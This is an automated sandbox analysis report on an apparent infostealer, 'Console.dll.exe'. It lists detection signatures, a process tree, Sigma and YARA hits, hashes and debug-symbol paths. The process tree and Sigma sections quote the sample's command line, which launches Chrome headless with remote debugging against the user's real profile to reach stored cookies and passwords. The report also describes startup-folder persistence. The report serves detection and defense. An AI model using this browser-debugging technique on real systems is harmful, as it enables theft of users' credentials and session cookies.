Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Console.dll.exe

Overview

General Information

Sample name:Console.dll.exe
Analysis ID:1576691
MD5:3dabbdb09892b980b8b48deeec718e63
SHA1:2c8b8f1c993c37fa8464cbf81e787fb1bda5abc1
SHA256:a3229a8a550cd643fd7b33c1265ca01b22370129d7374a099a3ac343c0e5bf3a
Tags:178-23-190-70exeuser-JAMESWT_MHT
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
AI detected suspicious sample
Contains functionality to prevent local Windows debugging
Drops PE files to the startup folder
Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Sample file is different than original file name gathered from version info
Sigma detected: Browser Execution In Headless Mode
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Console.dll.exe (PID: 3736 cmdline: "C:\Users\user\Desktop\Console.dll.exe" MD5: 3DABBDB09892B980B8B48DEEEC718E63)
    • chrome.exe (PID: 6132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 4252 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1728 --field-trial-handle=1436,i,4566748188218501428,17155313862400760302,262144 --disable-features=PaintHolding /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • Console.dll.exe (PID: 7728 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe" MD5: 3DABBDB09892B980B8B48DEEEC718E63)
    • chrome.exe (PID: 7768 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1788 --field-trial-handle=1528,i,11531674968129144497,11491206366923448469,262144 --disable-features=PaintHolding /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.dllJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\netstandard.dllJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.dllJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.Console.dll.exe.95c0000.5.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          7.2.Console.dll.exe.9210000.7.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Console.dll.exe", ParentImage: C:\Users\user\Desktop\Console.dll.exe, ParentProcessId: 3736, ParentProcessName: Console.dll.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data", ProcessId: 6132, ProcessName: chrome.exe
            Sigma detected: Browser Execution In Headless Mode
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Console.dll.exe", ParentImage: C:\Users\user\Desktop\Console.dll.exe, ParentProcessId: 3736, ParentProcessName: Console.dll.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data", ProcessId: 6132, ProcessName: chrome.exe
            Sigma detected: Browser Started with Remote Debugging
            Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Console.dll.exe", ParentImage: C:\Users\user\Desktop\Console.dll.exe, ParentProcessId: 3736, ParentProcessName: Console.dll.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data", ProcessId: 6132, ProcessName: chrome.exe
            Sigma detected: Startup Folder File Write
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Console.dll.exe, ProcessId: 3736, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.5% probability
            Source: Console.dll.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Console.dll.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: Console.dll.exe, 00000000.00000002.1631558379.0000000009C02000.00000002.00000001.01000000.00000014.sdmp, Console.dll.exe, 00000007.00000002.2003149476.0000000009252000.00000002.00000001.01000000.00000014.sdmp
            Source: Binary string: System.Net.Sockets.ni.pdb source: Console.dll.exe, 00000000.00000002.1636211837.000000006C021000.00000020.00000001.01000000.00000025.sdmp, Console.dll.exe, 00000007.00000002.2008453543.000000006C141000.00000020.00000001.01000000.00000025.sdmp
            Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: SQLitePCLRaw.core.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdb source: System.Security.Cryptography.ProtectedData.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Pipes.AccessControl\Release\net8.0-windows\System.IO.Pipes.AccessControl.pdb source: System.IO.Pipes.AccessControl.dll.0.dr
            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdb source: Console.dll.exe, 00000000.00000002.1631322072.0000000009B22000.00000002.00000001.01000000.00000013.sdmp, Console.dll.exe, 00000007.00000002.2003760302.00000000093B2000.00000002.00000001.01000000.00000013.sdmp
            Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdb source: System.Runtime.InteropServices.RuntimeInformation.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XmlSerializer\Release\net8.0\System.Xml.XmlSerializer.pdb source: System.Xml.XmlSerializer.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression.ZipFile\Release\net8.0-windows\System.IO.Compression.ZipFile.pdb source: Console.dll.exe, 00000000.00000002.1635631356.000000006BF51000.00000020.00000001.01000000.0000002B.sdmp, Console.dll.exe, 00000007.00000002.2011990883.000000006ED91000.00000020.00000001.01000000.0000002B.sdmp, System.IO.Compression.ZipFile.dll.0.dr
            Source: Binary string: /_/artifacts/obj/Microsoft.VisualBasic/Release/net8.0-windows/Microsoft.VisualBasic.pdb source: Console.dll.exe
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.Lightweight\Release\net8.0\System.Reflection.Emit.Lightweight.pdb source: System.Reflection.Emit.Lightweight.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Security.Permissions/netcoreapp3.0-Release/System.Security.Permissions.pdbSHA256 source: System.Security.Permissions.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdbSHA256Y source: Console.dll.exe
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.Lightweight\Release\net8.0\System.Reflection.Emit.Lightweight.pdbSHA2567 source: System.Reflection.Emit.Lightweight.dll.0.dr
            Source: Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1630061782.00000000095C2000.00000002.00000001.01000000.00000012.sdmp, Console.dll.exe, 00000007.00000002.2002875907.0000000009212000.00000002.00000001.01000000.00000012.sdmp, netstandard.dll.0.dr
            Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: Console.dll.exe, Microsoft.Win32.Registry.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: Console.dll.exe, 00000000.00000002.1636900853.000000006C161000.00000020.00000001.01000000.0000001E.sdmp, Console.dll.exe, 00000007.00000002.2008903871.000000006C241000.00000020.00000001.01000000.0000001E.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.TypeExtensions\Release\net8.0\System.Reflection.TypeExtensions.pdb source: System.Reflection.TypeExtensions.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1630204693.0000000009612000.00000002.00000001.01000000.00000007.sdmp, Console.dll.exe, 00000007.00000002.2001237728.0000000008C42000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1634300622.000000000C512000.00000002.00000001.01000000.00000029.sdmp, Console.dll.exe, 00000007.00000002.2006961538.000000000BF12000.00000002.00000001.01000000.00000029.sdmp
            Source: Binary string: System.Net.Security.ni.pdb source: Console.dll.exe, 00000000.00000002.1637368527.000000006C321000.00000020.00000001.01000000.0000001D.sdmp, Console.dll.exe, 00000007.00000002.2009258899.000000006C401000.00000020.00000001.01000000.0000001D.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression.ZipFile\Release\net8.0-windows\System.IO.Compression.ZipFile.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1635631356.000000006BF51000.00000020.00000001.01000000.0000002B.sdmp, Console.dll.exe, 00000007.00000002.2011990883.000000006ED91000.00000020.00000001.01000000.0000002B.sdmp, System.IO.Compression.ZipFile.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.TypeConverter\Release\net8.0\System.ComponentModel.TypeConverter.pdbSHA256x source: Console.dll.exe, 00000000.00000002.1642766032.000000006C7B1000.00000020.00000001.01000000.00000016.sdmp, Console.dll.exe, 00000007.00000002.2010033450.000000006C851000.00000020.00000001.01000000.00000016.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: Console.dll.exe, 00000000.00000002.1646860500.000000006FAC1000.00000020.00000001.01000000.0000002C.sdmp, Console.dll.exe, 00000007.00000002.2013487031.0000000070161000.00000020.00000001.01000000.0000002C.sdmp
            Source: Binary string: System.ObjectModel.ni.pdb source: Console.dll.exe, 00000000.00000002.1646976071.0000000073C61000.00000020.00000001.01000000.00000017.sdmp, Console.dll.exe, 00000007.00000002.2013616333.0000000073C61000.00000020.00000001.01000000.00000017.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: Console.dll.exe
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: Console.dll.exe, 00000000.00000002.1635971545.000000006C001000.00000020.00000001.01000000.00000027.sdmp, Console.dll.exe, 00000007.00000002.2008280739.000000006C121000.00000020.00000001.01000000.00000027.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x86\Release\System.Private.CoreLib.pdb source: Console.dll.exe, 00000000.00000002.1645448627.000000006CC41000.00000020.00000001.01000000.00000005.sdmp, Console.dll.exe, 00000007.00000002.2010963718.000000006CC41000.00000020.00000001.01000000.00000005.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\dlls\mscordac\mscordaccore.pdb source: Console.dll.exe, Console.dll.exe.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: Console.dll.exe, 00000000.00000002.1631801024.0000000009C42000.00000002.00000001.01000000.0000001A.sdmp, Console.dll.exe, 00000007.00000002.2003908860.0000000009472000.00000002.00000001.01000000.0000001A.sdmp, System.Diagnostics.Tracing.dll.0.dr
            Source: Binary string: System.Diagnostics.TextWriterTraceListener.ni.pdb source: System.Diagnostics.TextWriterTraceListener.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Resources.ResourceManager/Release/net8.0-windows/System.Resources.ResourceManager.pdbSHA256=l source: System.Resources.ResourceManager.dll.0.dr
            Source: Binary string: System.Collections.ni.pdb source: Console.dll.exe, 00000000.00000002.1646723335.000000006EDC1000.00000020.00000001.01000000.00000008.sdmp, Console.dll.exe, 00000007.00000002.2013312223.000000006FAA1000.00000020.00000001.01000000.00000008.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1638351948.000000006C631000.00000020.00000001.01000000.00000018.sdmp, Console.dll.exe, 00000007.00000002.2009638328.000000006C6D1000.00000020.00000001.01000000.00000018.sdmp
            Source: Binary string: System.Private.CoreLib.ni.pdb source: Console.dll.exe, 00000000.00000002.1645448627.000000006CC41000.00000020.00000001.01000000.00000005.sdmp, Console.dll.exe, 00000007.00000002.2010963718.000000006CC41000.00000020.00000001.01000000.00000005.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: Console.dll.exe, 00000000.00000002.1636729872.000000006C121000.00000020.00000001.01000000.0000001F.sdmp, Console.dll.exe, 00000007.00000002.2008763140.000000006C201000.00000020.00000001.01000000.0000001F.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: Console.dll.exe, 00000000.00000002.1638168932.000000006C5F1000.00000020.00000001.01000000.00000019.sdmp, Console.dll.exe, 00000007.00000002.2012133277.000000006EDC1000.00000020.00000001.01000000.00000019.sdmp
            Source: Binary string: /_/artifacts/obj/System.Dynamic.Runtime/Release/net8.0-windows/System.Dynamic.Runtime.pdb source: System.Dynamic.Runtime.dll.0.dr
            Source: Binary string: System.Runtime.InteropServices.ni.pdb.MRH source: Console.dll.exe, 00000000.00000002.1646500548.000000006EC51000.00000020.00000001.01000000.0000000C.sdmp, Console.dll.exe, 00000007.00000002.2012640726.000000006FA01000.00000020.00000001.01000000.0000000C.sdmp, System.Runtime.InteropServices.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdbSHA256;z source: System.Security.Cryptography.ProtectedData.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdbSHA256{) source: Console.dll.exe, 00000000.00000002.1629588247.0000000009532000.00000002.00000001.01000000.00000010.sdmp, Console.dll.exe, 00000007.00000002.2002494018.0000000009192000.00000002.00000001.01000000.00000010.sdmp
            Source: Binary string: System.Private.Uri.ni.pdb1 source: Console.dll.exe, 00000000.00000002.1636729872.000000006C121000.00000020.00000001.01000000.0000001F.sdmp, Console.dll.exe, 00000007.00000002.2008763140.000000006C201000.00000020.00000001.01000000.0000001F.sdmp
            Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: System.Runtime.Serialization.Primitives.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Reflection.Extensions/Release/net8.0-windows/System.Reflection.Extensions.pdb source: System.Reflection.Extensions.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Reflection.Extensions/Release/net8.0-windows/System.Reflection.Extensions.pdbSHA256 source: System.Reflection.Extensions.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.CSharp\Release\net8.0-windows\Microsoft.CSharp.pdb source: Console.dll.exe, Microsoft.CSharp.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: Console.dll.exe, 00000000.00000002.1645066855.000000006CBA1000.00000020.00000001.01000000.0000000F.sdmp, Console.dll.exe, 00000007.00000002.2012314955.000000006F8D1000.00000020.00000001.01000000.0000000F.sdmp, System.Threading.dll.0.dr
            Source: Binary string: System.Reflection.TypeExtensions.ni.pdb source: System.Reflection.TypeExtensions.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.WebSockets\Release\net8.0-windows\System.Net.WebSockets.pdb source: System.Net.WebSockets.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1631558379.0000000009C02000.00000002.00000001.01000000.00000014.sdmp, Console.dll.exe, 00000007.00000002.2003149476.0000000009252000.00000002.00000001.01000000.00000014.sdmp
            Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdbSHA256 source: System.Runtime.InteropServices.RuntimeInformation.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ObjectModel\Release\net8.0\System.ObjectModel.pdb source: Console.dll.exe, 00000000.00000002.1646976071.0000000073C61000.00000020.00000001.01000000.00000017.sdmp, Console.dll.exe, 00000007.00000002.2013616333.0000000073C61000.00000020.00000001.01000000.00000017.sdmp
            Source: Binary string: System.IO.Compression.ni.pdbU source: Console.dll.exe, 00000000.00000002.1635734665.000000006BF61000.00000020.00000001.01000000.0000002A.sdmp, Console.dll.exe, 00000007.00000002.2008096157.000000006C051000.00000020.00000001.01000000.0000002A.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1645167317.000000006CBC1000.00000020.00000001.01000000.0000000D.sdmp, Console.dll.exe, 00000007.00000002.2012440781.000000006F9D1000.00000020.00000001.01000000.0000000D.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.TextWriterTraceListener\Release\net8.0\System.Diagnostics.TextWriterTraceListener.pdb source: System.Diagnostics.TextWriterTraceListener.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdbSHA256 source: System.Runtime.Serialization.Primitives.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA256{) source: Console.dll.exe, 00000000.00000002.1634238960.000000000C502000.00000002.00000001.01000000.00000028.sdmp, Console.dll.exe, 00000007.00000002.2006811873.000000000BD42000.00000002.00000001.01000000.00000028.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Memory\Release\net8.0\System.Memory.pdb source: Console.dll.exe, 00000000.00000002.1645167317.000000006CBC1000.00000020.00000001.01000000.0000000D.sdmp, Console.dll.exe, 00000007.00000002.2012440781.000000006F9D1000.00000020.00000001.01000000.0000000D.sdmp
            Source: Binary string: /_/artifacts/obj/System.IO.UnmanagedMemoryStream/Release/net8.0-windows/System.IO.UnmanagedMemoryStream.pdb source: System.IO.UnmanagedMemoryStream.dll.0.dr
            Source: Binary string: /_/artifacts/obj/netstandard/Release/net8.0-windows/netstandard.pdb source: Console.dll.exe, 00000000.00000002.1630061782.00000000095C2000.00000002.00000001.01000000.00000012.sdmp, Console.dll.exe, 00000007.00000002.2002875907.0000000009212000.00000002.00000001.01000000.00000012.sdmp, netstandard.dll.0.dr
            Source: Binary string: Microsoft.Win32.Registry.ni.pdb} source: Console.dll.exe, Microsoft.Win32.Registry.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1635971545.000000006C001000.00000020.00000001.01000000.00000027.sdmp, Console.dll.exe, 00000007.00000002.2008280739.000000006C121000.00000020.00000001.01000000.00000027.sdmp
            Source: Binary string: C:\Users\Gaming\source\repos\Console\Console\obj\Release\net8.0\win-x86\Console.pdb source: Console.dll.exe
            Source: Binary string: System.Linq.Expressions.ni.pdb{ source: Console.dll.exe, 00000000.00000002.1643170420.000000006C861000.00000020.00000001.01000000.00000015.sdmp, Console.dll.exe, 00000007.00000002.2010341131.000000006C901000.00000020.00000001.01000000.00000015.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdbSHA256 source: Console.dll.exe
            Source: Binary string: System.Net.NameResolution.ni.pdb source: Console.dll.exe, 00000000.00000002.1635971545.000000006C001000.00000020.00000001.01000000.00000027.sdmp, Console.dll.exe, 00000007.00000002.2008280739.000000006C121000.00000020.00000001.01000000.00000027.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.TypeConverter\Release\net8.0\System.ComponentModel.TypeConverter.pdb source: Console.dll.exe, 00000000.00000002.1642766032.000000006C7B1000.00000020.00000001.01000000.00000016.sdmp, Console.dll.exe, 00000007.00000002.2010033450.000000006C851000.00000020.00000001.01000000.00000016.sdmp
            Source: Binary string: /_/artifacts/obj/System.Runtime.Serialization/Release/net8.0-windows/System.Runtime.Serialization.pdb source: System.Runtime.Serialization.dll.0.dr
            Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdbg source: Console.dll.exe, 00000000.00000002.1637593746.000000006C3C1000.00000020.00000001.01000000.0000001C.sdmp, Console.dll.exe, 00000007.00000002.2009427893.000000006C4A1000.00000020.00000001.01000000.0000001C.sdmp, System.Diagnostics.DiagnosticSource.dll.0.dr
            Source: Binary string: Microsoft.VisualBasic.Core.ni.pdbz source: Console.dll.exe
            Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: Console.dll.exe, 00000000.00000002.1637593746.000000006C3C1000.00000020.00000001.01000000.0000001C.sdmp, Console.dll.exe, 00000007.00000002.2009427893.000000006C4A1000.00000020.00000001.01000000.0000001C.sdmp, System.Diagnostics.DiagnosticSource.dll.0.dr
            Source: Binary string: System.Threading.ni.pdb source: Console.dll.exe, 00000000.00000002.1645066855.000000006CBA1000.00000020.00000001.01000000.0000000F.sdmp, Console.dll.exe, 00000007.00000002.2012314955.000000006F8D1000.00000020.00000001.01000000.0000000F.sdmp, System.Threading.dll.0.dr
            Source: Binary string: System.Threading.Tasks.Parallel.ni.pdb source: System.Threading.Tasks.Parallel.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq.Expressions\Release\net8.0\System.Linq.Expressions.pdb source: Console.dll.exe, 00000000.00000002.1643170420.000000006C861000.00000020.00000001.01000000.00000015.sdmp, Console.dll.exe, 00000007.00000002.2010341131.000000006C901000.00000020.00000001.01000000.00000015.sdmp
            Source: Binary string: /_/artifacts/obj/System.Configuration/Release/net8.0-windows/System.Configuration.pdbSHA256> source: System.Configuration.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression\Release\net8.0-windows\System.IO.Compression.pdbSHA2562aj source: Console.dll.exe, 00000000.00000002.1635734665.000000006BF61000.00000020.00000001.01000000.0000002A.sdmp, Console.dll.exe, 00000007.00000002.2008096157.000000006C051000.00000020.00000001.01000000.0000002A.sdmp
            Source: Binary string: System.Net.Sockets.ni.pdbX^ source: Console.dll.exe, 00000000.00000002.1636211837.000000006C021000.00000020.00000001.01000000.00000025.sdmp, Console.dll.exe, 00000007.00000002.2008453543.000000006C141000.00000020.00000001.01000000.00000025.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: Console.dll.exe, 00000000.00000002.1646500548.000000006EC51000.00000020.00000001.01000000.0000000C.sdmp, Console.dll.exe, 00000007.00000002.2012640726.000000006FA01000.00000020.00000001.01000000.0000000C.sdmp, System.Runtime.InteropServices.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdbSHA256 source: Console.dll.exe
            Source: Binary string: System.Security.Cryptography.ni.pdb, source: Console.dll.exe, 00000000.00000002.1636900853.000000006C161000.00000020.00000001.01000000.0000001E.sdmp, Console.dll.exe, 00000007.00000002.2008903871.000000006C241000.00000020.00000001.01000000.0000001E.sdmp
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Algorithms/Release/net8.0-windows/System.Security.Cryptography.Algorithms.pdbSHA256 source: System.Security.Cryptography.Algorithms.dll.0.dr
            Source: Binary string: C:\Users\Gaming\source\repos\Console\Console\obj\Release\net8.0\win-x86\Console.pdbSHA256 source: Console.dll.exe
            Source: Binary string: /_/artifacts/obj/System.Buffers/Release/net8.0-windows/System.Buffers.pdbSHA256 source: Console.dll.exe, System.Buffers.dll.0.dr
            Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2015\Win32\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmp
